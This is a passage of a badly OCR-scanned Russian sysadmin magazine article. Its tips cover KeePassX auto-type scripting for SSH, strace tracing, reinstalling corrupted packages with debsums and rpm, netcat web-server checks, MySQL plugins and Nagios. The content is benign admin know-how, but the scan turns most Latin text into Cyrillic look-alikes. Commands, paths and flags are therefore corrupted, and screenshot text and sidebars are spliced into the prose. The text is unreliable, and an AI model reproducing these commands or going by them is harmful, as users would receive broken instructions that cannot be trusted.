каждый раз нажимать <С\ + В> и <С\ + С> для того, чтобы скопировать имя пользователя 
и пароль соответственно. Но если зайти на сайт, поставить курсор в поле ввода логина, пере- 
йти в окно КееРа$$Х и на выбранной записи нажать <СШ + \>, то данные аккаунта на сайте 
заполнятся сами. Это есть обычный автоввод, и ты, наверное, об этом знаешь. Программа, 

бесспорно, удобна, а всего лишь легким движением пальцев ее можно улучшить до идеала 


с /етс/агаситх. соп 

с /етс/ри15е/дефаи]*.ра 
с етс/1п1ттаь 

[гос @габЬ1х-гер -]# Й 


72.5 


Авотинаш подопытный! От «грт -\Ма» не скроешься! 


юзабилити, просто применив дополнительные фичи продвину- 
того режима автоввода. Секрет кроется в хитрости заполнения 
поля «Комментарий» — оказывается, его можно использовать 
как способ пошагово задать алгоритм выполнения любых дей- 
ствий в соседнем окне. 

Например, для того чтобы залогиниться на удаленный сер- 
вер по 5$Н, вставь в комментарий строку: 


Ацто-Туре: $51 -1 {Узегпаме} {ИКЕ}{ЕМТЕК } «= 
{РЕЁАУ 3000}{Раззмога } {ЕМТЕК} 


Запусти терминал и нажми <С + \>. КееРа$$Х напечатает 
«$5П -| имя_пользователя адрес сервера», нажмет <Ещег>, по- 
дождет три секунды, введет пароль и завершит ввод клавишей 
<Ещег>. Фактически ты можешь запрограммировать любую по- 
следовательность действий для любого из сервисов. 

Часто используемые клавиши я представлю ниже: 


Таь {ТАВ} 

Епфег {ЕМТЕВ} или ^ 
Стрелка вверх {УР} 

Стрелка вниз {рОим} 
Стрелка влево ВЕЕТ} 
Стрелка вправо — {КТСНТ} 


Тизег* {ТМ№5ЕВТ} или {1№} 

Ре1ефе ОЕЕЕТЕ}. ИЛИ. ЧОЕЁ 

Ноте {НОМЕ } 

Епа {ЕМО} 

ВасК5расе ВАСКЪРАСЕ В$; или 1ВКЗР 
Езсаре {ЕС} 

Клавиша М1паом$: {мТМ№}, левая {МТМ}, правая {КитТм} 
Арр$/Мепи {АРР5} 

Рг1ип{ 5сгееп {РКТУС} 

ИТ + 


9Ьгхего - 


А67тег0@1оса1Но${:-$ $51 467ег0@192.168.1.34 -р 443 
467ег0@192.168.1.34 раззмога: 
Ме1соте Фо Цбипфи 12.10 (СМИ/+11пих 3.5.0-27-вепег1с х86_64) 


* ОБоситепфа1от: Пре: //пе1р.ибипфи . сот/ 


14 расКавез сап Бе ирдатеа. 
8 ирдафе$ аге зесиг1Фу ирдате$х. 


№ем ге1еазе '13.04’ ауа11аб1е. 
Кип '4о-ге1еазе-иртга4е' фо ирегаае То 11. 


Га${ 1оЕ1п: Ег1 Мау 3 11:04:48 2013 +гот 1оса1по$+ 
а6тег0@1оса1по5{:-$ 


Подключаемся по $$Н, указав порт 443, хотя в действительности 
демон $5Па виситна 22-м порту 


126 $УМ/АСК 


СЕг1 ^ 
АТЕ % 


Полезные команды: 


{ОЕЕАУ Х} 
{СЕЕАВЕТЕЕО} 


Задержка в Х миллисекунд 
Очищает поле, где стоит курсор 


КееРа$$Х может искать даже окна — «Ащо-Туре-\ММпаом-1: * 
- Мдераа»! Таким образом ты можешь создавать на каждую за- 
пись, оберегаемую КееРа$$Х, свой сценарий для любой из про- 
грамм, чтобы меньше стирать пальцы о клавиатуру :). 


ПРОГРАММНЫЙ СЛЕДОПЫТ 

Часто случается так, что на боевом сервере начинает твориться 
что-то неладное. Первое, на что посоветуют обратить внимание 
бородатые админы, — это логи. Логи, несомненно, основной 
источник информации, особенно в загадочных ситуациях, но, 
что грустно, не всегда они способны вскрыть раковину непони- 
мания и показать жемчужину причины сбоев. 

Если проблема в программном продукте возникает на этапе 
разработки, ее быстро отслеживают и исправляют девелопе- 
ры своими продвинутыми средствами отладки. Чем мы хуже? 
Давай исправим несправедливость ситуации и воспользуемся 
хотя бы простейшими приемами дебаг-кунг-фу. Мне кажется, 
что каждый юниксовый админ должен быть немного програм- 
мистом и научиться этому для понимания корня проблемы. 
К слову, именно специалисты такого уровня наиболее ценны 
для работодателя. 

Данное вступление посвящено моей любимой утилите 
Згасе. Все, что она делает, — в реальном времени отображает 
трассировку всех библиотечных вызовов. Ее можно использо- 
вать при запуске программы, например: 


$ $Егасе /61п/15$ -1ай 
ехесуе ("/Б1п/15", ["15", "-1ай"], == 
[/* 490 уаг$ */]} = @ 


Ьгк(@) = охэе+ее00 


ассез$ ("/ефс/1а.ъ0.поймсар", Е_ОК) = -1 «+ 
ЕМОЕМТ (М зисН #Я1е ог а1гес®огу) 


итар2(МИЕЕ, 8192, РВОТ_ВЕАО|РВОТ_ИВТТЕ, «= 
МАР_РЕТ\АТЕ | МАР_АМОМУМОЦ$, -1, 0) = @хь76ебеее 


ассе$$ (" /ефс/14.5о.рге1оаа", К_ОК) = -1 +: 
ЕМОЕМТ (Мо зисН #Я1е ог а1гес®огу) 


ореп("/е*с/14.зо0.сасйе", 0_ВООМУ |0_СТОЕХЕС) = 3 


+5{а*64(3, {5% тоае=$_ТЕВЕб| 0644, ‹: 
$ _$17е=94794, ...}) = @ 


ттар2 (МИГ, 94794, РВОТ_ВЕАО, МАР_РВТ\УАТЕ, 3, 9) = «=* 
0хЬ76се000 


с105е(3) = @ 


Или можно запросто аттачиться к уже работающим про- 
цессам, указывая Р!О ключом '-р', и сохранять вывод прямиком 
в файл '-о': 


# $Егасе -о оифрие.ТхЕ -р 1234 


Как нам может помочь многосотенный вывод системных 
вызовов на экран? Никак :). Поэтому системные вызовы лучше 
фильтровать через ключ '-е'’. Чаще всего админов интересует 
вызов функции открытия файлов ореп(), например для понима- 
ния того, откуда софтина берет конфиг или куда пишет данные. 
Рассмотрим этот метод применительно к ЗКуре, чтобы узнать, 
какие файлы он читает при запуске. Чтобы убрать все неудач- 
ные попытки открыть файл, мы исключим строки, содержащие 
код ошибки ЕМОЕМТ (нет такого файла или каталога), а также 
отфильтруем открытие библиотек *.50. 
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ЧБЬгего- 


гипп1пе: "еспо "бЕТ / НТТР1.1\п\п" | пс -му +1туфоропу 80"... 
вефа4аг1т®о: Мате ог зегу1се поф Кпоип 
ИАКМТМб: гези]{: РАТЬЕО! 


| еспо "бЕТ / НТТР1.1\п\п" | пс -му 1оса1по$е 80 
| еспо "СЕТ / НТТР1.1\ п\п" пс -у\у Рзегуег 89 


| еспо "бЕТ / НТТР1.1\п\п" | пс -му злабб1х 3128 


| еспо "бЕТ / НТТР1.1\п\п" | пс -Уу ТПегеарег 8080 
| есво "СЕТ / НТТР1.1\п\п" | пс -уу Е1туфоропу 89 


ТМЕО: сотр1ете! 
Ч62его@1оса11о$*:--$ 


РГехесщегвыполняет сканирование Мтар’ом 


ВОЛШЕБНАЯ ПАЛОЧКА 


На диске ты найдешь простую 

по своей механике утилиту, которой 

я пользуюсь ежедневно на протяжении 
нескольких лет. Служит она для по- 
следовательного выполнения любых 
команд, читая аргументы из тексто- 
вого файла либо конвейера. Файл 
должен соответствовать формату «арг 
ументО;аргумент1;аргумент2», где «;» 
является разделителем. Например: 


$ саЕ зегуег_рогЕ_115%. 1х 


зегуег1 . сот; 80 


зегуег2 . сот; 3128 
зегуегЗ. сот; 8080 


Например, нам надо с помощью 
Меса+{ понять, доступен ли по выше- 
определенному списку веб-сервер. 
Для этого нужно выполнить: 


$ саё зегуег_рогЕ_11$%.%хе | + 
ехесифег "еспо \"СЕТ / ++ 
НТТР1.1\п\п\ | пс -му % %1"" 


Строки файла разобьются на аргумен- 
ты и будут подставляться в пс через 
идентификаторы %0, %1 и так далее. 
С помощью еспо мы передадим 
МасаРу НТТР-запрос главной страни- 
цы «СЕТ / НТТР1.1\п\п». В конце про- 
грамма выведет отчет об успешности 


исполнения всех действий. 


$ ${гасе -е ореп $Куре 2>8&1 | евгер -у "ЕМОЕМТ|.5$0" 


ореп( "/поте/а67ег9/.РопЕ5/аг1а1.Е++Р", О_КООМЕУ) = 39 
ореп( "/поте/а67ег@9/.5куре/а6хег@ /сопйя .хт1", += 
О_ВООМЕУ [О _ГАВСбЕЕТЕЕ) = 40 

ореп( "/поте/а67ег@9/.5куре/а6хег@ /сопйя .хт1", += 
О_ВООМЕУ [О _ГАВСбЕЕТЕЕ) = 40 


Как видишь, позаимствованные у разработчиков инструменты могут 
принести пользу карьерному бытию администратора. 


ВСЕ ПРОПАЛО! 

Раз уж мы затронули тему бэкапирования, то неплохо было бы нам 
вспомнить и о его брате — восстановлении, на этот раз файлов. Недавно 
на моей работе произошел трагический случай — частично потерялись 
данные на сервере. Так получилось, что многие библиотеки и бинарные 
файлы потеряли свое содержимое и стали размером по 0 байт. Серверы 
были вне моей юрисдикции, поэтому вначале я мирно наблюдал за тем, 
как проблему обсудили, а затем собрались решать мои коллеги. Кто-то 
предлагал переустановить систему поверх, кто-то — организовать новый 
сервер и перенести только файлы с нужными данными, — собственно, 
типичные решения, которые ты и я многократно проходили на пыльном 
жизненном пути. Выслушав их предложения, я, как заправский супер- 
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герой, вмешался, и через 15 минут сервер был поднят с колен 
и принял привычную боевую стойку. Что я сделал? Ввел всего 
одну строку в баше, применив лишь знания средств операцион- 
ной системы, а именно менеджера пакетов. 

Ежедневно устанавливая массу пакетов в свой любимый 
дистрибутив, многие забывают, что они содержат список кон- 
трольных сумм файлов, позволяющих проверить их целост- 
ность. Для демонстрации данного функционала в системах, 
построенных на аеб-пакетах, мы попросим помощи у аебзитз: 


# арф-веф 1п$фа11 -у аебзит$ 


Нагнетая обстановку, специально для тебя я поломал би- 
нарник нашего любимого Мтар :). Пусть утилита пробежится 
по всем известным ей пакетам и проверит, не повреждены ли 
какие-то установленные файлы: 


# аеб$ит$ -с 


/ч5г/61п/птар 


Вот и нашелся наш мученик! Дальше нужно выяснить, како- 
му пакету принадлежит измененный файл. В этом нам поможет 
флаг '-$5' программы арка: 


$ аркг -$ /ч5г/61п/птар 


птар: /ч$г/61п/птар 


Фактически, получив имя пакета, в данном случае «птар», 
ты уже можешь его переустановить, используя ключ '--гет$ а!" 
утилиты ар{-дет. Но мы сведем все операции в одну команду, 
которая, помимо всего, выудит из «Акра -$» через разделитель 
«:» имя пакета с помощью «с\щ -4 : -11» и переустановит его: 


# аре-веЕ 1п5$%а11 -у --ге1п$а11 $(аркКе -5 +: 
$ (аебзитз -с) | сие -а : -+1 | ип1а -и) 


Поскольку ВРМ-Базеа серверов уж точно не меньше дебиа- 
новских, то я буду проклят, если не рассмотрю спасение и око- 
локрасношапочных систем. Для проверки целостности файлов 
воспользуемся ключами `-\/` (проверить) и '-а' (все пакеты): 


# грт -\а 


Бани То 


с /еёс/сир$/зиб$сг1рЕ1оп$. соп+ 
/ч5г/61п/птар 


Есть результат! Но что это за набор букв и цифр в начале? 
Первые восемь символов — флаги, обозначающие, что ано- 
мального случилось с файлом: 

‚ 5 — изменился изначальный размер файла; 

‚ М — изменились права доступа или режим; 

‚ о э — отличается контрольная сумма МО5; 

‚ О — отличается старший/младший номер файла устрой- 
ства; 

. | — изменился путь ссылки; 

‚ Ц — отличается владелец (пользователь) файла; 

‚ С — изменился владелец группы; 

. Т —_ отличается время изменения. 


Из приведенного выше примера мы можем сделать вывод 
о том, что у /изг/Бт/птар изменился размер, обнаружилась не- 
верная МО5-сумма и отличается время модификации. 

Помимо этих флагов, следует два пробела и символ, харак- 
теризующий тип файла. Буква «с» означает конфигурационный 
файл, также значения могут быть: 

‚ А — файл документации; 

. 9 — файлы, изначально отсутствующие в пакете; 
. |—_ файл лицензии; 

‚ Гг_—_ файл геаате. 


Как видишь, нет специального флага для того, чтобы от- 
дельно выделить бинарные файлы, вместо этого там стоит 
пробел. Поэтому напишем регулярное выражение, с помо- 
щью которого мы выведем только строки, начинающиеся 


9Бтего- 
№тар 4опе: 1 ТР аддге$$ (1 Поз ир) зсаппеа 1п 0.31 зесопа$ 
% т1те 5есоп@$ изес5$/са11 са11$ еггог$ 5у$са11 
35.27 0.000085 2 37 гк 
21.99 0.000053 0 1006 1006 соппес{ 
21.16 0.000051 0 2004 5е{5осКорф 
12.03 0.000029 [2 73 мтар 
9.54 0.000023 0 2004 сп] 
0.00 0.000000 [2] 199 геаа 
0.00 0.000000 [2] 8 иг1 те 
0.00 0.000000 [2] 38 ореп 
0.00 0.000000 [2] 1044 с105е 
0.00 0.000000 [2] 27 21 этаЕ 
0.00 0.000000 [2] 38 {та 
0.00 0.000000 [2] 13 15еек 
0.00 0.000000 [2 36 прготесЕ 
0.00 0.000000 0 19 миптар 
0.00 0.000000 [2 :1 ГЕ_$1вас{1оп 
0.00 0.000000 0 24 23 10с{1 
0.00 0.000000 0 22 19 ассе$$ 
0.00 0.000000 0 23 5е1ес{ 
о.о0 о.оеоеео о 1 вефр1а 
0.00 0.000000 [2] 1096 5оскет 
0.00 0.000000 [2 ы 5е{5оскКпате 
0.00 0.000000 [2 9 Бетреегпате 
0.00 0.000000 © 19002 вет5оскоре 
0.00 0.000000 [2] 1 ехесуе 
0.00 0.000000 [2] 6 геаа11пкК 
0.00 0.000000 [2 8 5е1г11т1{ 
0.00 0.000000 [2 13 Бефи1 а 
0.00 0.000000 0 к 5е1514 
0.00 0.000000 [2 8 вефеи1 4 
0.00 0.000000 0 1 Бетер1а 
0.090 0.000000 [2] :1 агсй_ргсЕ1 
0.00 0.000000 [2 4 5е{г11т11{ 
199.09 0.000241 8673 1069 Тота1 
тег @1оса1Ноз{:-$ В 


с флага «^$» (размер файла изменился). Последующие во- 
семь символов нас не интересуют «.{8}», ведь на основании 
предыдущего утверждения мы уже можем сделать вывод 
о необходимости переустановки пакета. Далее (для бинар- 
ных файлов) следуют четыре пробела < {4}». А последующий 
путь может быть произвольной длины и состоять из произ- 
ВОЛЬНЫХ СИМВОЛОВ «.*». 

Как итог. получим изменившиеся бинарные файлы с помо- 
щью версии огер, полностью поддерживающей расширенные 
регулярные выражения, — едгер: 


# грт -\Ма | езгер "^$.{8} {4}.*" 


аи Ты 


/ч5г/61п/птар 


Достаем через разделитель ' ' пятый аргумент — путь к из- 
менившемуся файлу: 


# грт -\Ма | еёгер "^$.{8} {4}.*" | си -а '' -+5 


и$г/Б1п/пта 


Осталось узнать, какому пакету принадлежит поврежден- 
ный файл, для этого у НЕМ есть ключи '-а#: 


# грт -а+ $(грт -\Ма | еггер "^$.{8} {4}.*" | ‹: 
сиЕ -а '' -+5) | ип1а -ч 


птар-6.25-1.+с18.х86_64 


И завершающим аккордом добавляем к предыдущим 
командам переустановку всех пакетов с поврежденными би- 
нарниками с помощью уит гет$ай: 


# учит ге1пт${а11 - грм -а+ грт -\а еггер ++ 
"^5.{8} {4}.*" | си -а ' ' -+5) | ип1а -и) 


Вуаля, рабочая система готова продолжать служить тебе 
и дальше. 


НАРРУЕМО 

По каждому из рецептов ты можешь сделать вывод о том, 
что всегда можно найти новые решения даже к традиционным, 
казалось бы, устоявшимся подходам. А там, где и это не полу- 
чается, — смело старайся создавать что-то свое, уникальное, 
новое. = 
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Профайлим Мтар: вы- 
зов $4гасе сключом '-с" 


ПОЧЕМУ 

В КОНФИГЕ 
УЗЕН УКА- 
ЗАН ПОРТ 
443? 


443-й порт исполь- 
зуется по умолчанию 
неслучайно: так 

как уровень до- 

верия к ЗЕ высок, 

то именно его часто 
пробрасывают нару- 
жу и редко фильтруют 
файрволом. 


АА АА 


Последняя версия $511 
находится по адресу: 


900.9/73уп0 


Ознакомиться под- 
робнее с документа- 
цией автозаполнения 

в КееРа$$Х ты можешь 
на официальном сайте: 


00.01/6/$2А 


125 $УМ/АСК 


СПОСОБНЫЕ 
ПОДМАСТЕРЬЯ 


ОБЗОР ПОЛЕЗНЫХ ДОПОЛНЕНИЙ 2. 
И ИНСТРУМЕНТОВ ДЛЯ ПОПУЛЯРНЫХ ор и 


ХАКЕР 07 /174/ 2013 


«У 
& ми 


“А 


Сергей Яремчук 


9ппдег@зупаск.ги 


А о = 
ПРИЛОЖЕНИЙ МУЗОГ, МАС!О$ И $МОАТ аа" 


9! 
А 


`ф 
ь. 3 А ты 
| ни 'Х., и 
И т. ее 
уч" РА 
Е р й т 


\.: 


5 
’” Хх 


< — 
м“. 
АС 
У 


« 
а —. 
ме < ^^ - 


14 
И 1 
4445455 


Как известно, большинство *тх-приложений развивается по принципу К!$$ 
(Кеер ( $итр/е тира), когда разработчики занимаются только самыми 
необходимыми, на их взгляд, функциями. Остальные возможности отда- 


ны на откуп третьим сторонам. В итоге проекты обрастают субпроектами, 
предлагающими все необходимое, но в их многообразии подчас разо- 


Ораться совсем не просто. 


СУБД МУЗОТ. 

Долгое время МуЗОЁ поддерживала так называемые пользовательские 
функции (Чзег-Бейпеа Гипсйоп, ЦОР), которые по своему применению на- 
поминают плагины, хотя их использование ограничено обработкой данных. 
Существовали, конечно, и плагины, но их применение требовало пересборки 
серверной части. Возможность простого добавления расширения при по- 
мощи специального рд-т АР! появилась в МуЗОЕ начиная с версии 5.1. 
Это позволило на лету подключать и отключать плагины при помощи команд 
|МЗТАН- РЕУ@М и УМИМ$УТАН- РИОСМ, и главное — теперь не требуется пере- 
компиляция сервера. Плагины размещаются в каталоге, указанном в пере- 
менной ридт_ат конфига ту.спт. Просмотреть список доступных плагинов 
можно так: 


ту$91> °Пом \уаг1аб1ез 11ке 
ту$а1> °Пом р1и51п$; 


‘р1Тирти 91‘; 


В ответ получим название нужного каталога и список плагинов. Устанав- 
ливаем новый плагин в указанный каталог и активируем: 


ту$91> ТМЗТАЕЕ РЕУСТМ ааетоп_тетсасйед $ОМАМЕ «= 
'116тетсасйеа.$о0'; 
ту$91> УМТМ$ТАЕЕ РЕЧСТМ даетоп_тетсаспеа; 


Возможности плагинов, по сравнению с ЦОЕ гораздо шире и затраги- 
вают практически все сферы применения СУБД. С каждым новым релизом 
возможности рид-т АР! расширялись, и в последней версии МУЗОЕ 5.7 
(Чемеортет т!е${опе гаеазе) поддерживается уже восемь типов плагинов: 


‚ УЧогаде епатез — для реализации хранения специфических типов дан- 
ных, которые будут доступны через 5О(; 

‚ Оаетоп$ — запуск фоновых процессов; 

‚  Ри-ех рагзег$ — может быть использован для индексирования тексто- 
вых данных и специализированной обработки выражений РГУЦТЕХТ- 
запросов; 

‚ МРОАМАТОМ_ЗСНЕМА {а Мез — для организации «виртуальной базы 
данных» в таблице поптаНоп_зспета (обеспечивает доступ к метадан- 
ным БД) при помощи специальной функции поптаНоп_зспета (появи- 
лась в МуЗСЕ 5.1); 

.  Зепт5упсйгопои$ герйсаНоп — по умолчанию в МуЗОЕ используется асин- 
хронная репликация, эти плагины позволяют использовать полусинхрон- 
ную репликацию (поддержка появилась в 5.5), когда коммит на мастере 
происходит еще до того, как транзакция отправляется на реплику. Следу- 
етпомнить, что в сетях с большой задержкой производительность при ис- 
пользовании зеппзупсйгопои$ падает; 

. АцаНтпоа — плагины для регистрации событий аудита; 

. Ашщпепйсайоп — плагины, расширяющие возможность аутентификации; 

.  Раззмога-\айаайоп — интерфейс для создания плагинов, позволяющих 
проверять пароли на прочность. 


Еще два нюанса, о которых нужно знать: плагины бывают для сервер- 
ной и клиентской части, необходимо отслеживать совместимость с текущей 
версией МуЗОЕ. Причем плагины для Муз ОЕ нередко работают и в клонах — 
Ои77е, МапабВ и Регсопа Зегуег. 

Сегодня можно найти десятки готовых решений в каждой категории, пер- 
вые три особенно популярны. 
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Необходимость обрабатывать большие объемы данных привела к тому, 
что все более популярной становится концепция МоЗОЕ (Мот Оту ЗО — 
не только ЗО). Большинство М№оЗОЁ-решений разработаны с нуля, но па- 
раллельно доступны разработки для популярных СУБД, расширяющие их 
возможности. Для МУЗОЕ наиболее популярны: Метсаспеа (51.1у/16и$567(, 
разработка Огасе, поддержка появилась в МУЗСЕ 5.2.6) иНапегЗоскет (Би. 
[у/15В\УРх5), хотя это не весь список. 

Например, НапЧегЗоскег позволяет обращаться к МУуЗОЕ, так же 
как к МоЗСЕ, избегая накладных расходов, связанных с ЗС. Чтобы ускорить 
обработку, Нап МегЗоске не закрывает таблицы по окончании операций, 
а оставляет их открытыми для повторного использования. В итоге произво- 
дительность возрастает примерно в пять-шесть раз по сравнению с обработ- 
кой обычного ЭОС! -запроса. 

Яркими примерами плагинов из второй категории служат проекты, кото- 
рые даже не нуждаются в особом представлении: Зрйшх (зрИтхзеагсв.сот) 
и поисковый движок тпобоЗеагсй (тподозеагсй.ога), используемые на мно- 
гих веб-сайтах. В рамках проекта Эрйх (кстати, автор проживает в России) 
реализована поддержка полнотекстового поиска для любых типов хранилищ 
МУЗОЕ (в том числе МУЗАМ, ппоб)В, МОВ, архив и так далее), его характери- 
зует масштабируемость, высокая скорость индексации и поиска, распреде- 
ленная возможность поиска. 

Для поиска по шаблону МУЗОЁ поддерживает расширенную версию 
предложенной Генри Спенсером (Непгу Зрепсег) реализации регулярных 
выражений (оператор ВЕСЕХР, подробнее 9и.!у/10КОсе), которая, по при- 
знанию самих же разработчиков, некорректно работает с мультибайтными 
кодировками. Для некоторых задач лучше подходят РСВАЕ-совместимые вы- 
ражения (Реп СотранЫе Ведщаг Ехргеззюп$), реализованные в И6_тузаиат_ 
ргед (тузашат.ога/И6_тузаша{_ргед). 

Отслеживание состояния сервиса — важная часть администрирования 
СУБД, знать все параметры поможет распространяемый по лицензии СМИ 
СРЁ плагин мониторинга от Регсопа (61.1у/177К{Са), который совместим 
с Сасй, Мадю$ и некоторыми другими специализированными решениями. 
Кстати, Регсопа выпускает незаменимый в работе каждого ОВА инструмент — 
Регсопа ТооКй Тог МуЗОЕ (ранее Маа К"), представляющий собой набор 
из более чем 30 Реп-скриптов, упрощающих многие операции при работе 
с МузОЕ: репликацию, резервирование и восстановление информации, мо- 
ниторинг, анализ запросов, исследование эффективности настроек сервера 
баз данных, контроль привилегий и многое другое. 

Сегодня доступа к серверу баз данных может требовать большое коли- 
чество пользователей. Встроенный (па!\е) механизм аутентификации через 
плагин туза! паН\уе_ ра$з$\мога, проверяющий изегате/ра$$мюога в таблице 
уза!.изег, не всегда удобен (есть, кстати, и плагин ту$а! о! _раз$\мога, со- 
вместимый с паролями МуЗОЕ до 4.1.1). Особенно если уже имеется готовая 
база учетных записей. Но все это легко организовать при помощи плагинов, 
в которых реализованы любые политики аутентификации пользователей, 
не привязанные к схеме МуЗОЕ и предоставляющие большее количество 
возможностей и механизмов. Например, для коммерческой версии МУЗОЕ 
Огасе предлагает два плагина: 

.’ РАМ Ашщпепйсайопт Ридт (ашПеписайоп рат) — использует механизмы 
аутентификации РАМ Ипх и ЕРАР в различных приложениях и контекстах, 

с гибко настраиваемыми правилами. В качестве параметров доступны все 

методы РАМ: логин, пароль, имя хоста и так далее; 


Зегтьла} - +х 

Яю Ед Мом 5еасВ Лепти Нер 

|ту$41> ЗВом уагаа61е$ 11Ке “р1ир1т_91г'; 

*----.........-.-- Фе -------.+ 

| Уагла61е пате | Уа1ие | 

Фе. Фаны. + 

| рИрзп_9г | Иозс/116/ уз Ир аои | 

Фаза ь Фан ьь + 


1 гом 10 $05 (0.07 5ес) 


у$91> ЗНОМ РЬШСТМ$; 


Фо фин аи в Физ физ фФььцьнышь = $ф 


+ + + 
| Мале Зтати$ | Туре | ЕЁ6гагу | Е1сепуе | 
Фо фоны Фо фо Фоеьььььь- + 
| 617108 АСТТУЕ | $ТОВАбЕ ЕМОТМЕ | МЬ | СР | 
| ву$91_пат1уе_раззмогв АСТТУЕ | АИТНЕМТТСАТТОН | МАЕ | СРА 
| №у$91_019_ра$змогв АСТТУЕ | АИТНЕМТТСАТТОН | ме | СР 
| Мут$АМ АСТТУЕ | $ТОКВАбЕ ЕМСТМЕ | Мм | РА 
| МЕМОВУ | АСТТУЕ | $ТОВАСЕ ЕМСТМЕ | МА | РА 
| ©$\ АСТТУЕ | ЗТОВАСЕ ЕМСТМЕ | М | РА 
| МЕб_МУТЗАМ АСТТУЕ | $ТОКАСЕ ЕМСТМЕ | мА | СР 
| ВЕАСКНОСЕ | АСТТУЕ | $ТОКАСЕ ЕМСТМЕ | М | РА 
| РЕОЕКАТЕО | ОТЗАВАЕО | $ТОКАбЕ ЕМСТМЕ | МА | СР 
| Толо0в АСТТУЕ | $ТОВАСЕ ЕМСТМЕ | МА | СРА 
| ТАНООВ_ТАХ АСТТУЕ | ТЫРОВМАТТОМ $СНЕМА | МАЕ | РА 
| ТМНООВ_ КОСК АСТТУЕ | ТЫРОАМАТТОН 5СНЕМА | МАИ | СР 
| ТМ№ООВ КОСК МА!Т$ АСТТУЕ | ТЫРОЯМАТТОН $СНЕМА | МАЕ | СР 
| ТМНООВ СМР АСТТУЕ | ТЫРОЯАМАТТОН $СНЕМА | МАЕ | бРА 
| ТМНООВ_СМР_ЯЕЗЕТ | АСТ1ТМЕ | ТМРОЯМАТТОН $СНЕМА | МЛ | СР | 
| ТММООВ_ СМРМЕМ АСТТУЕ | ТУРОАМАТТОН УСНЕМА | МАК | бРА | 
| ТМ№ООВ СМРМЕМ ЯЕЗЕТ АСТТУЕ | ТИРОЯМАТТОН ЗСНЕМА | МЕ | бРА | 
| 1№4008_ВОРРЕЙЯ _РАСЕ АСТТУЕ | ТУРОАМАТТОН $СНЕМА | МАЕ | РА 
| 1ТМ№00В_ВУРЕЕЯ_РАСЕ ЯМ АСТТУЕ | 1МРОЯМАТТОМ ЗСНЕМА | МА | СР 
| ТМНООВ_ ВИРРЕЯ РОО $5ТАТЗ | АСТТУЕ | ТЫРОЯМАТТОН $УСНЕМА | МАЕ | бРА 
| РЕЙРОЯМАМСЕ ЗСНЕМА | АСТТУЕ | $ТОВАСЕ ЕМСТМЕ | МЕ | СР | 
| ААСНТУЕ АСТТУЕ | ЭТОКАбЕ ЕМСТМЕ | МК | бРА 
| рагсаттот АСТТУЕ | $ТОКАСЕ ЕМСТМЕ | Мм | СР | 
+ * + 


23 гомз 1п зет (0.04 зе) 


Смотрим список доступных плагинов МуЗОЕ 


729 


Мад\!$ визуализирует состояние узлов и сервисов, предоставляя наглядную карту 


. \\Мпаом/$ Мане АчПепйсайоп Р\идт — использует механизмы аутентифи- 
кации \ММпао\м/$, после регистрации пользователь может без дополнитель- 
ного ввода учетных данных подключиться к СУБД. 


Исходный код этих модулей достался Огабе по наследству, поэтому 
многие считают неправильным, что в настоящее время его нет в свободном 
доступе. Но есть простой выход: аналогичные плагины предлагают форки 
МанарВ, Оп22е (6 и.1у/10КОАХИ) и Регсопа Зегуег, но в отличие от МуЗОЕ они 
выпущены под СМИ СРЕ. Учитывая родство, собрать любой из них для рабо- 
ты с МуЗОЕ труда не составит. Причем Регсопа предлагает и свой вариант 
РАМ-модуля для МузЗОЕ (Ь(.1у/1876рМа), поддерживающий, кроме указанных 
выше, также аутентификацию при помощи ВАЗА Зесигею. Вариант от Ои727!е 
интересен тем, что унего РАМ и РАР реализованы в виде отдельных модулей, 
что очень хорошо, так как 1РАР-запрос идет напрямую к серверу, а не через 
РАМ (пароль в этом случае передается в открытом виде). Кроме того, предло- 
жены варианты аутентификации при помощи текстового файла и НТТР также 
есть плагин, разрешающий все соединения без аутентификации. 


СИСТЕМА МОНИТОРИНГА МАС!О0$ 

Постоянное наблюдение за всеми слагаемыми компьютерной сети позво- 
ляет выявить проблемные участки и устранить их до того, как произойдет 
сбой или они смогут повлиять на работу сети, а оповещение поможет быстро 
устранить неисправность. Вот здесь и выручают системы мониторинга. Одно 
из самых популярных среди ореп 5оигсе решений — Мад!о$ (пад!0$.ога), от- 
слеживающий использование ресурсов серверов (загруженность СРЦ, рас- 
ходование НАМ и дискового пространства и так далее) и выполняющий мо- 


Ф < Мадюх Соге - ‘фогю = $ 
[9 Марноь Соге о’ 
«$ * Хх - © мы посывомлооь оз. @ г 
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Базовые возможности можно расширить за счетбольшого числа плагинов, 
аддонов, патчей и утилит 


Зо $УМ/АСК 


52 Септеоп РЕ ВОО, 
не — 
Для быстрого развертывания 10$ на базе Зпой можно ис- 5 тели ии иазшиниих  мишииниых ‚ниши 
пользовать специальные решения, требующие минимум с ы = 
на = ° 


настроек. Так, Еазу!0$ ($Ккупе-зоиоп$.пе?) представляет 
собой дистрибутив СетО$ с предустановленными и на- 
строенными компонентами: Зпо\, Вагпуага, МуЗО(, ВАЗЕ, 
пор, агрма\сй и многими другими утилитами. 
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Дистрибутив РАМ (Рийу 
Ащотаед Мад!о$, 


КПуацотаедпад!о$. 


ниторинг работы сетевых сервисов (НТТР, ЗМТР, 
РОРЗ, 1МАР, З$Н и многих других). Информацию 
можно получить при помощи веб-интерфейса. 
Базовые возможности можно расширить за счет 
большого числа плагинов, аддонов, патчей и утилит, которые 
практически полностью покрывают все потребности. Офици- 
альными считаются около 50 плагинов проекта Мадю$ Ридт$ 
(пачюзриаз.ога), и именно они обычно ставятся по умолча- 
нию при использовании пакетного менеджера дистрибутива (но 
не всегда в пакете они все), обеспечивая возможности монито- 
ринга базовых параметров и основных сервисов — СРУ, ОЗУ, 
диска, ОМ$, МуЗОЕ, З$Н и других. За время существования 
проекта сообществом было создано более 2000 дополнений 
в 40 категориях, большая часть из которых доступна на ресурсах 
Мадюз Ехспапде (ехспапае.пао!ю$.ога) и МопНоппоЕхсйапде 


ога) позволяет быстро (попйоппаехспапае.ога). Некоторые плагины для Мадо$ будут 
развернуть Мад!0$ работать и в клонах — 1стда или ЭНКеп. 
с дополнительными Например, Спеск МК (таш!аз-Кке{цпег.дае) позволяет ав- 
модулями. В качестве томатически и с минимальными нагрузками на хост собирать 
интерфейса доступ- информацию о сервисах удаленного узла, заменяя некоторые 


ны также Сетгеоп и 
Мад\/$. На прилагаемом 


стандартные плагины (МАРЕ, М$СИет, спеск_зптр и другие). 
Для получения данных с удаленных систем используется всего 


к журналу дискеты один сервис (вместо нескольких) и единственное сетевое со- 
найдешь видеоролик, единение (по умолчанию 6556/ТСР через хтаа). Это дает воз- 
демонстрирующий можность при помощи одного сервера мониторить большее ко- 
